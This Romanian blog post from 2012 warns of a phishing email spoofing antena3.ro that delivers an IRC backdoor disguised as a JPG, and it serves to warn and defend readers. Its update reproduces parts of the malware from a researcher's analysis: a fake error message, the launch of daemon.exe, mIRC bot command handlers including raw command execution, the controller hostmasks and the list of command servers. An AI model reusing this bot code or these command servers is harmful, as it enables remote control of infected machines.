Pages

luni, 16 ianuarie 2012

Atentie: atac informatic in numele antena3

image
Tocmai am primit un set de mailuri cu adresa de expediție ce pare a fi contact@antena3.ro care anunță că ”Traian Băsescu demisionează”. E truc destul de bun în a convinge utilizatorii neștiutori să dea clic pe un link care în teorie ar duce la o poză cu expresia Elenei Udrea la aflarea veștii.

Vedeți mai jos adresa exactă de unde vine mesajul:

image
Băieții care sunt în spatele atacului exploatează (destul de bine) manifestațiile din țară încercând să mai infecteze câteva zeci/sute de sisteme mizând pe curiozitatea utilizatorului neavizat.
De fapt, link-ul duce către un download pentru fișierul pulsetread.com/udrea-nocomment.jpg.exe – un executabil infectat cu un backdoor ce se conectează la IRC și probabil că acolo așteaptă comenzi ulterioare.
image
NU DAȚI CLIC PE LINK ȘI MAI CU SEAMĂ NU DESCHIDEȚI EXECUTABILUL. În afara unui backdoor nu veți găsi nimic interesant la link-ul respectiv.
În mod normal un antivirus adus la zi va detecta infecția. Kaspersky AntiVirus îl vede sub forma Backdoor.IRC.Zapchast.zwrc
Găsiți aici informații despre malware și cum să scăpați de el.
image
UPDATE: Câteva informații interesante despre atac mi-au fost date de Ștefan Tănase, Senior Security Researcher din Global Research and Analysis Team de laKaspersky Lab.
image

Este un IRC bot comun, bazat pe Mirc. M-am uitat prin el și nu are nimic targetat – în afara de subiectul cu "Udrea". În rest, un IRC bot ca oricare altul. Odată rulat, va afișa un mesaj fake de eroare: msgbox "Cannot open file 'udrea-nocomment.jpg'. Acces is denied.",16,"Windows Photo Viewer Exception"
Apoi rulează un binar - daemon.exe
start %SystemRoot%\Temp\Cookies\daemon.exe - clientul de  mirc.
Câteva din comenzile pe care le așteaptă bot-ul de IRC:
if ($2 == ontime) { .notice $nick

10Ontime

4:

2 $uptime(server,1) | halt }
if ($2 == uptime) { .notice $nick

10Uptime

4:

2 $duration($calc( $ticks / 1000)) | halt } if ($2 == cserv) { .notice $nick

6Current Server

2:

14 $server } if ($2 == msg) { .msg $3- | halt }
if ($2 == say) { .msg $chan $3- | halt }
if ($2 == me) { describe $chan $3- | halt }
if ($2 == notice) { notice $3- | halt }
if ($2 == away) { .away | .away $3- | halt }
if ($2 == join) { join $3- | who $3 | halt }
if ($2 == part) { part $3 }
if ($2 == raw) { $$3- }
if ($2 == exit) && ($level($address($nick,2)) > 2) { exit | halt }
if ($2 == part) {
Prin cod există informații despre utilizatorii de Undernet ce au drepturi de control asupra bot-ului:
n2=100:*!*@Razvy.users.undernet.org
n3=100:*!*@Cupid.users.undernet.org
n4=100:*!*@beibe.users.undernet.org
Posibil ca Razvy, Cupid și beibe din PHTeam să profite de demonstrațiile de ieri în alt mod decât o fac cei din stradă?
Servere-le la care se conectează bot-ul :
n1=FreedomSERVER:irc.thisisfreedom.net:6667GROUP:Freedom
n2=FreedomSERVER:irc.thisisfreedom.net:6669GROUP:Freedom
n3=FreedomSERVER:my-station.us:6667GROUP:Freedom
n4=FreedomSERVER:iclimb.com:6669GROUP:Freedom
n5=BucharestSERVER:82.76.255.62:6661GROUP:Undernet
n6=BudapestSERVER:94.125.182.255:6665GROUP:Undernet
n7=DiemenSERVER:194.109.20.90:6668GROUP:Undernet
n8=TampaSERVER:208.83.20.130:6667GROUP:Undernet
n9=HamburgSERVER:95.141.29.22:6664GROUP:Undernet
Sursa: chip.ro

0 comentarii:

Trimiteți un comentariu

 
Powered by High tech Blog™